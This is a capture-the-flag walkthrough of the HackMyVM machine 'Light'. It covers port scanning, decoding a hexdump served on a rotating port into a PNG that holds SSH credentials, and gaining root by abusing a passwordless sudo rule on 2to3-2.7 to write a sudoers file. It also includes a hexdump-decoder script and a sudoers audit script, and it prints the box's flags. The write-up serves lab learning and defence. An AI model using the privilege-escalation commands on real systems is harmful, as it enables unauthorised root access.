HackMyVM | Light

In this walkthrough, I demonstrate how I obtained complete ownership of Light from HackMyVM.
In: HackMyVM, Attack, CTF, Home Lab, Linux, Medium Challenge
ℹ️ I keep all of my distrusted hosts from platforms like HackMyVM on a segmented VLAN -- 10.9.9.0/24 -- that has no internet access.

Nmap Results

# Nmap 7.95 scan initiated Fri Nov 21 17:01:20 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.9.9.17
Nmap scan report for 10.9.9.17
Host is up (0.00041s latency).
Not shown: 65533 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
|   256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
|_  256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
25850/tcp open  unknown
| fingerprint-strings: 
|   GenericLines, NULL: 
|     00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
|     00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
|     00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
|     00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
|     00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
|     00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
|     00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0 ..E..q...-.,s...
|     00000070: 0c08 7292 0491 2092 8380 08e2 09ca c1a1 ..r... .........
|     00000080: 2248 7aed c799 2ea7 a67a 6f7b c3ed edf2 "Hz......zo{....
|     00000090: 7c3f 5553 1c7d bdd3 d361 9f09 bbf7 5400 |?US.}...a....T.
|     000000a0: 8021 c20f 8025 c20f 8025 c20f 8025 c20f .!...%...%...%..
|     000000b0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
|     000000c0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
|_    000000d0: 8025 c

Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Nov 21 17:01:27 2025 -- 1 IP address (1 host up) scanned in 6.71 seconds

Service Enumeration

TCP/HIGH_PORT

ℹ️ I noticed that this port would rotate every few seconds, so you'll need to continuously port scan while you enumerate.

sudo nmap -Pn -p- -T4 10.9.9.17 |
grep 'open' | grep -v '^22/' | cut -d '/' -f 1 |
xargs -I {} nc -nv 10.9.9.17 {}

One-liner to automate the high-port discovery and connection (the grep excludes only the SSH port itself, not every port number containing "22")
💡 This looks suspiciously like hexdump -C output, and the .PNG magic bytes seem to point to this being a hexdump of a .png file.

sudo nmap -Pn -p- -T4 10.9.9.17 |
grep 'open' | grep -v '^22/' | cut -d '/' -f 1 |
xargs -I {} nc -nv 10.9.9.17 {} |
xxd -r > file.orig

Adds a pipe to xxd -r to decode from hexdump back to the original byte stream (xxd -r reads the dump from stdin, so it must not be wrapped in xargs, which would pass the dump lines to it as file names)

The original appears to be a PNG file.
I'm thinking we have an SSH credential.

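As an added example (not the author's code), here is a small Python decoder for the listing format the high port returns, using the rows from the scan above as a constructed sample. It rebuilds the byte stream the way xxd -r does, also accepting hexdump -C rows and the `*` marker hexdump prints for repeated rows, and then confirms the result really is a PNG by validating the signature and reading the IHDR chunk (width, height, bit depth, colour type and the chunk CRC). The names parse_hexdump and png_header are this example's own.

```python
import re
import struct
import zlib

# Constructed sample: the first six rows of the listing nmap printed for the
# high port on this box, in the offset/colon layout that xxd uses.
SAMPLE_LISTING = """\
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
"""

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
ROW_RE = re.compile(r"^\s*([0-9A-Fa-f]{8})[: ]\s*(.*)$")
HEX_TOKEN_RE = re.compile(r"^[0-9A-Fa-f]+$")


def parse_hexdump(text):
    """Decode xxd-style or `hexdump -C` style text into the bytes it describes.

    Rows are identified by their leading offset. The ASCII column is dropped:
    `hexdump -C` wraps it in |...|, and xxd-style rows are cut at the first
    token that is not an even-length hex string (or once 16 bytes are read).
    A bare `*` row, which hexdump uses for repeated rows, is expanded by
    repeating the previous row up to the offset of the next row.
    """
    out = bytearray()
    last_row = b""
    fill_pending = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "*":
            fill_pending = True
            continue
        m = ROW_RE.match(line)
        if not m:
            continue  # not a dump row; ignore stray text
        offset = int(m.group(1), 16)
        hex_area = m.group(2).split("|", 1)[0]
        row = bytearray()
        for token in hex_area.split():
            if not HEX_TOKEN_RE.match(token) or len(token) % 2:
                break
            row += bytes.fromhex(token)
            if len(row) >= 16:
                break
        if fill_pending and last_row:
            while len(out) < offset:
                out += last_row
            del out[offset:]
            fill_pending = False
        if row:
            out += row
            last_row = bytes(row)
    return bytes(out)


def png_header(data):
    """Validate the PNG signature and return the IHDR fields, or raise ValueError."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("PNG signature missing")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    width, height, depth, color, _comp, _filt, interlace = struct.unpack(">IIBBBBB", data[16:29])
    (stored_crc,) = struct.unpack(">I", data[29:33])
    # The chunk CRC covers the type field plus the chunk data.
    crc_ok = (zlib.crc32(data[12:29]) & 0xFFFFFFFF) == stored_crc
    return {"width": width, "height": height, "bit_depth": depth,
            "color_type": color, "interlace": interlace, "ihdr_crc_ok": crc_ok}


if __name__ == "__main__":
    recovered = parse_hexdump(SAMPLE_LISTING)
    print(len(recovered), "bytes recovered")
    print(png_header(recovered))
```

Feeding the full capture from the one-liner to parse_hexdump instead of SAMPLE_LISTING gives the same bytes that xxd -r writes to file.orig; png_header is a quick way to tell a genuine image from something that merely starts with the PNG magic.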
Exploit

SSH Access

The username / password combo from the PNG file worked.

Post-Exploit Enumeration

Operating Environment

OS & Kernel

Linux light 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64 GNU/Linux

PRETTY_NAME="Debian GNU/Linux 10 (buster)"
NAME="Debian GNU/Linux"
VERSION_ID="10"
VERSION="10 (buster)"
VERSION_CODENAME=buster
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Current User

uid=1000(lover) gid=1000(lover) groups=1000(lover),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Matching Defaults entries for lover on light:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lover may run the following commands on light:
    (ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7

Network Configurations

Network Interfaces

ens18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether bc:24:11:34:d5:6a brd ff:ff:ff:ff:ff:ff
    inet 10.9.9.17/24 brd 10.9.9.255 scope global dynamic ens18
       valid_lft 5151sec preferred_lft 5151sec
    inet6 fe80::be24:11ff:fe34:d56a/64 scope link 
       valid_lft forever preferred_lft forever

Privilege Escalation

Sudo Privileges

Password-less sudo on 2to3-2.7
Inspecting the file and some help output
💡 Looking through the -h output, I found a way to get arbitrary file write even when the source file isn't even a Python script. The -d or --doctests_only flag allowed me to put configurations in the "python" script that weren't even Python code, and the 2to3 parser didn't complain about syntax issues.
cd "$HOME"

Change back to "/home/lover"

echo -en 'lover\t\tALL=(ALL:ALL) NOPASSWD: ALL' > lover

Create a "sudoers" file that will allow us to run all commands using "sudo" without a password

sudo /usr/bin/2to3-2.7 -d -x NOFIX -n -W -o /etc/sudoers.d/ ./lover
  • -d / --doctests_only — since our file does not contain any Python doctests, nothing is actually done by 2to3
  • -x NOFIX — this is especially true because we are using this option
  • -n — don't make a backup of /home/lover/lover
  • -W — write the new file even if no changes were made
  • -o — write the "fixed" file to /etc/sudoers.d/ instead of overwriting the input (the original file name is used)
  • ./lover is the file to inspect
"/etc/sudoers.d/lover" has been created with the original content intact.
We are root!

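From the defender's side, the root cause on this box is a NOPASSWD rule on a program that, run as root, can write a file to any directory, with no argument restriction in the rule. The following Python audit is an added example (not the author's or the box's code): it parses sudoers text such as the rule sudo -l reported above, or the fragment written to /etc/sudoers.d/lover in this section, and flags rules a review should question. The FILE_WRITE_CAPABLE set, the constructed sample rules and the severity scheme are this example's own assumptions.

```python
import os
import re

# Programs that, when they may be run as root, let the caller write a file of the
# caller's choosing. 2to3 is listed because of the -o/--output-dir and -W
# behaviour used on this box; the rest are common editors and copy tools.
# This set is an assumption for the example, not a complete catalogue.
FILE_WRITE_CAPABLE = {
    "2to3", "2to3-2.7", "tee", "cp", "mv", "dd",
    "vi", "vim", "nano", "python", "python2", "python3", "perl",
}

# user host=(runas) TAG: commands   -- the runas and tag parts are optional
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>[^=\s]+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)
SKIP_PREFIXES = ("#", "@", "Defaults", "User_Alias", "Runas_Alias",
                 "Host_Alias", "Cmnd_Alias")

# Constructed sample: the rule sudo -l reported on this box, plus two others.
SAMPLE_SUDOERS = """\
Defaults        env_reset, mail_badpass
lover   ALL=(ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7
backup  ALL=(root) /usr/bin/rsync -a /srv/data/ /mnt/backup/
admin   ALL=(ALL:ALL) ALL
"""


def _logical_lines(text):
    """Yield sudoers lines with backslash continuations joined."""
    buf = ""
    for raw in text.splitlines():
        line = raw.rstrip()
        if line.endswith("\\"):
            buf += line[:-1] + " "
            continue
        yield (buf + line).strip()
        buf = ""
    if buf:
        yield buf.strip()


def _runs_as_root(runas):
    """The (runas) part is optional and defaults to root."""
    if runas is None:
        return True
    target_user = runas.split(":", 1)[0].strip()
    return target_user in ("root", "ALL")


def audit_sudoers(text):
    """Return a finding per granted command that deserves a reviewer's attention."""
    findings = []
    for line in _logical_lines(text):
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = "NOPASSWD:" in m.group("tags")
        as_root = _runs_as_root(m.group("runas"))
        for cmd in m.group("cmds").split(","):
            cmd = cmd.strip()
            if not cmd or cmd.startswith("!"):
                continue  # negated entries deny rather than grant
            parts = cmd.split()
            name = os.path.basename(parts[0])
            reasons = []
            if nopasswd:
                reasons.append("NOPASSWD")
            if cmd == "ALL":
                reasons.append("grants ALL commands")
            elif as_root and name in FILE_WRITE_CAPABLE:
                reasons.append("file-write-capable command as root")
                if len(parts) == 1:
                    reasons.append("arguments unrestricted")
            if not reasons:
                continue
            high = nopasswd and as_root and (cmd == "ALL" or name in FILE_WRITE_CAPABLE)
            findings.append({"user": m.group("user"), "command": cmd,
                             "severity": "high" if high else "medium",
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f['severity']:6} {f['user']}: {f['command']} ({', '.join(f['reasons'])})")
```

For a real review, pass the concatenated contents of /etc/sudoers and /etc/sudoers.d/* to audit_sudoers; the rule on this box scores high because all three conditions coincide (no password, root as the run-as user, and a file-writing tool with unrestricted arguments), while a rule that pins the arguments or requires a password scores lower.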
Flags

User

iloveopenedports

Root

ilovepython
More from 0xBEN